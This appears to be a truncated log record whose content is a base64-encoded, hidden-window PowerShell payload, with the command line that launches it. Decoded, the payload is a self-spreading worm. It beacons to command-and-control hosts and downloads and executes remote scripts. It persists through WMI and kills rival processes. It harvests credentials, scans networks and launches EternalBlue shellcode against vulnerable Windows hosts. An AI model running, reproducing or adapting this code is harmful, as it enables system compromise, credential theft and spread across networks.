YwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAa